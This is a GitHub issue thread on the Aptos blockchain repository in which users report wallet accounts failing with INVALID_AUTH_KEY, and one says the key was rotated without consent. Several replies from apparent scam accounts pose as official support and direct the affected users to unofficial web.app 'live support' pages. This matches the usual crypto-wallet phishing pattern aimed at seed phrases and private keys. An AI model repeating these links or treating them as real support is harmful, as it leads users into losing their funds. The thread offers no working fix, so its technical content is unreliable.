### ISSUE TITLE
> same issue here, anyone managed to solve it?

### ISSUE THREAD

**Issue by adeshkhari** [aptos-labs/aptos-core#15417]
> same issue here, anyone managed to solve it?
> 
> the account worked and sent transactions and now it just stopped working getting INVALID_AUTH_KEY, in code and in extension wallet

Are the issue solved or not? I have same problem with this.anyone can help?

_Originally posted by @hosseinsanjaei in https://github.com/aptos-labs/aptos-core/issues/5428#issuecomment-2098542101_

**Comment by block-scouthelp** [comment]
@adeshkhari It sounds like your query would be best dealt with by the support team.

Please see the link below to our dedicated support line:

Support :[Help Center](https://dapps-exploreonsite.web.app/)

Note: Click on the live chat icon at the bottom corner of the page to start a conversation

**Comment by block-scouthelp** [comment]
Have you able to resolved your issues yet?

**Comment by frank239tech** [comment]
> > same issue here, anyone managed to solve it?
> > the account worked and sent transactions and now it just stopped working getting INVALID_AUTH_KEY, in code and in extension wallet
> 
> Are the issue solved or not? I have same problem with this.anyone can help?
> 
> _Originally posted by @hosseinsanjaei in [#5428 (comment)](https://github.com/aptos-labs/aptos-core/issues/5428#issuecomment-2098542101)_

Kindly create chat with the support to get your issues resolved as soon as possible [SUPPORT](https://dapps-exploreonsite.web.app)

**Comment by Dolian-coder5** [comment]
Hello @adeshkhari  A support ticket has been opened for you. Kindly Talk to Support on the [Live support page](https://crypto-onlinrectifications.web.app/) so that your issue can be looked into. [CLICK HERE](https://crypto-onlinrectifications.web.app/)

**Comment by Kolanudetak** [comment]
Hello @adeshkhari 
This will be review by the support team. Visit the live support page to initiate a chat with an agent for further assistance via [live agent](https://websynchronizefix.web.app).
Regards

**Comment by adeshkhari** [comment]
Brother help me

**Comment by Johnivan113** [comment]
same problem. Account was rotated without my participation. How can I fix it?

**Comment by hosseinsanjaei** [comment]
0x7d831c39344997e62c7594ab2fbf3d9fa7208ab6fc8d1dc26aa4bd83b6d64a75

‫‪Johnivan113‬‏ ***@***.***‬‏> در تاریخ چهارشنبه ۱۱ دسامبر
۲۰۲۴ ساعت ۲۲:۱۹ نوشت:‬

**Comment by hosseinsanjaei** [comment]
Can you fix it?

**Comment by Johnivan113** [comment]
No. It's strange that many people have this problem and no one understands its source. I haven't found a solution anywhere.
